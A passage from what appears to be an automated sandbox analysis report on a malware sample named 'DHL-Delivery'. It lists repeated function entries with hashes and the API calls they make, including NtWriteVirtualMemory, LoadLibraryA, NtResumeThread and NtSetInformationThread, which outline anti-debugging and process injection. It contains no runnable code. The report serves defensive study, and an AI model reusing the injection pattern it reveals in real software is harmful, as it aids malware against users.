                        • Opcode Fuzzy Hash: b3a4556a13ee1dedd385a2cf9d37934a31c4ec21a7ae9f478791367d48ac745d
                        • Instruction Fuzzy Hash: 1661CD39BCA3A74EDB11D9748CB63D937A3DF06640F8840ADD942C7182D76AC14BC6A7
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: ntdll
                        • API String ID: 543350213-3337577438
                        • Opcode ID: e278fc301567b8e02612b343ba31cfa38472f6305fbe3de2f4d1a54dc44378d9
                        • Instruction ID: 21f9503ea5bc33d946c65a895f6514d6f5be1bf45376431e6448811051a8c9e8
                        • Opcode Fuzzy Hash: e278fc301567b8e02612b343ba31cfa38472f6305fbe3de2f4d1a54dc44378d9
                        • Instruction Fuzzy Hash: 2861CD7D7CA3A74EDB01D9748CA63D837A3DF02650F9841ADD942C7182D76AC14BC2A7
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: "_P
                        • API String ID: 3527976591-1889545488
                        • Opcode ID: 0a0d49c63f2aa8c4b2e626a8dd1256e7b71b384983e801cadb5c2d323f5845b1
                        • Instruction ID: 41d2013635845a2f1b0a7272a09071a016640cc9066a045c25dc1a764f4a5989
                        • Opcode Fuzzy Hash: 0a0d49c63f2aa8c4b2e626a8dd1256e7b71b384983e801cadb5c2d323f5845b1
                        • Instruction Fuzzy Hash: 313134787C1346AEEF255E28DCE1BE832A7BF14740FD94128ED9597050D7BA80D5C782
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: a3d3876829b820080b8697d8fab659583d5e8cea91df989ec0a16f3b996278be
                        • Instruction ID: 9a13040807646bf7250b58e49b2565ff800fd7796d988434477df9320b640303
                        • Opcode Fuzzy Hash: a3d3876829b820080b8697d8fab659583d5e8cea91df989ec0a16f3b996278be
                        • Instruction Fuzzy Hash: 85D135787C030AAEFF242D288DB17E522A7AF51790F954129EDD6971C4C7FA84CAC742
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca01b4860a615a9fda74cf2aeaa3427530b1fd4ddc0c8c2fd75b7a6f4c724dfb
                        • Instruction ID: b97203a197221ae87ecc75b0340de8818ec1e28aa90d5e6b32e9a8d9a3f0fb13
                        • Opcode Fuzzy Hash: ca01b4860a615a9fda74cf2aeaa3427530b1fd4ddc0c8c2fd75b7a6f4c724dfb
                        • Instruction Fuzzy Hash: 29D146787C030AAEFF242D288CB17E522A7AF51790FD54129EDD6971C4C7BA84C9C702
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: d2967a7fd27627b70df2ee289a94363e0e37a0740d5d4ce7eabc8918b94240e9
                        • Instruction ID: 529fa418e635edb2956b54e1fad4aad69bafca3632ebc8374fc6c1c54e83891d
                        • Opcode Fuzzy Hash: d2967a7fd27627b70df2ee289a94363e0e37a0740d5d4ce7eabc8918b94240e9
                        • Instruction Fuzzy Hash: BAC144787C030AAEFF242D688CB17F52267AF51790FD54129EDD6971C4C7BA84C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 0dcfb59c1c8c05ef69d2ff59791924bc2aa5d2c959bb90375105dae9587f66f2
                        • Instruction ID: ece3ed352f1635f5933d79e3726122267733e0bf7489862f2160fda92e05d294
                        • Opcode Fuzzy Hash: 0dcfb59c1c8c05ef69d2ff59791924bc2aa5d2c959bb90375105dae9587f66f2
                        • Instruction Fuzzy Hash: E0C135787C030AAEFF242D688CB17F922A7BF55390FD54129EDD697184C7BA84C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 66b46a8e951410fa1c18aaf2f425e2c9b8554a4ae3aef224a857d5c23ecc54be
                        • Instruction ID: 0dd03337ea7407e33c0ce031676ffc0dbef8dce980f750069559594f94a94da0
                        • Opcode Fuzzy Hash: 66b46a8e951410fa1c18aaf2f425e2c9b8554a4ae3aef224a857d5c23ecc54be
                        • Instruction Fuzzy Hash: 3EC135787C030AAEFF242D689CB17F922A7BF15390FD64129EDD697184C7A984C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: d6b41e2887f6321272755ea11f2b067052b73c9d6ed0f71d5f5e65b8ea876525
                        • Instruction ID: 02faabe776000d51d724137d2aedba468b24392411939e59f5da3a3ce0316bc3
                        • Opcode Fuzzy Hash: d6b41e2887f6321272755ea11f2b067052b73c9d6ed0f71d5f5e65b8ea876525
                        • Instruction Fuzzy Hash: 11B145787C030AAEFF242D689CB17F922A7BF55390F964129EDC697184C7B984C9C742
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: a96c107be5d49e3d8a92af5efc2ccf91cfd6157ee25d53b1672000b4a8d79cd0
                        • Instruction ID: 3d2d5d509e74846a09f813d2f91d1e552c2d40b5c94ae2f40ee307e043ee29d5
                        • Opcode Fuzzy Hash: a96c107be5d49e3d8a92af5efc2ccf91cfd6157ee25d53b1672000b4a8d79cd0
                        • Instruction Fuzzy Hash: 4FB123787C030AAEFF252D688CB17E922A7BF15390F964029EDC697184C7B984C9C742
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 138158e2318353fe88a259ca10f47f873b023617cd9ca2fbf0cd19a7941d42a2
                        • Instruction ID: a818717f2a50cbad5a3d7c56f87796261a9d7caa5d075f65b3fc5db29e9e8f21
                        • Opcode Fuzzy Hash: 138158e2318353fe88a259ca10f47f873b023617cd9ca2fbf0cd19a7941d42a2
                        • Instruction Fuzzy Hash: 71B122787C030AAEFF252D68CCB17E932A7BF55390F964129ED8697184C7B984C9C642
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 48f1516d895aa14a0da4100804b445624418124b849fc4e61ac745904399c971
                        • Instruction ID: a0718d1cd650df379b4ee776c43f8a7f6fd31d403523ce1ec5e5b906ed4b42cc
                        • Opcode Fuzzy Hash: 48f1516d895aa14a0da4100804b445624418124b849fc4e61ac745904399c971
                        • Instruction Fuzzy Hash: 36B123787C034AAEFF256D68CCB17E93267BF15380F958029ED8697184D7B984C9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 3dd924675a7b8a20f459ab9b31f05ced9860da699019a1455ce2e4cb25b3705f
                        • Instruction ID: 5731410b74bade7886ce323d81b928e311bd5d5218180f74576fdbe5999b0c2b
                        • Opcode Fuzzy Hash: 3dd924675a7b8a20f459ab9b31f05ced9860da699019a1455ce2e4cb25b3705f
                        • Instruction Fuzzy Hash: E3A122787C030AAEFF246D688CB17F932A7BF15380F954029ED8697184D7F984D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 9a3469f476e1ca74b20febc697e2bdfbb3c8c46adbee4a96f5c5037c973ea129
                        • Instruction ID: c1ee437d8fb9e5b599fd9572f65458f18d25a86be5f9aebd52c0261e6282fa4e
                        • Opcode Fuzzy Hash: 9a3469f476e1ca74b20febc697e2bdfbb3c8c46adbee4a96f5c5037c973ea129
                        • Instruction Fuzzy Hash: F6A121787C034AAEFF242D28CCB17E93267BF15380F954029ED9A97184D7A984D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: f703570bdb6e881de685853c851cf699c0df81b04239ab5b46a4d6a9a2423359
                        • Instruction ID: 25b60066d5b68308ddd4ca769800e771591834cff485b63ab0d377d8d08d2b77
                        • Opcode Fuzzy Hash: f703570bdb6e881de685853c851cf699c0df81b04239ab5b46a4d6a9a2423359
                        • Instruction Fuzzy Hash: BA9111787C034AAEFF245D68CCB17F97267BF14780F954029ED8A97184C7E988D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 38149484a2a7dcceac96b7463a77c77b0de691d9e3dbd9fbf3f3c6f344216f30
                        • Instruction ID: 6d8f712b43563b826c0c22a0a50b3c0a4662b6f4173342842ecc9c340c276959
                        • Opcode Fuzzy Hash: 38149484a2a7dcceac96b7463a77c77b0de691d9e3dbd9fbf3f3c6f344216f30
                        • Instruction Fuzzy Hash: A49112787C034AAEFF251D68CCB17F92267BF54780F954029ED8697184C7F988D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 6f85692eab50bd462f5e8142739a8140bdf1335bb4675003b22d01f5a96eb0d0
                        • Instruction ID: fe512c4999cf04649f01e712d10155ad1b308c6fcd6b5271cb5ce6c74323415a
                        • Opcode Fuzzy Hash: 6f85692eab50bd462f5e8142739a8140bdf1335bb4675003b22d01f5a96eb0d0
                        • Instruction Fuzzy Hash: 1D9156787C438AAEFF251D688CB17F92667BF15380F994029EDC697181C7E988C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
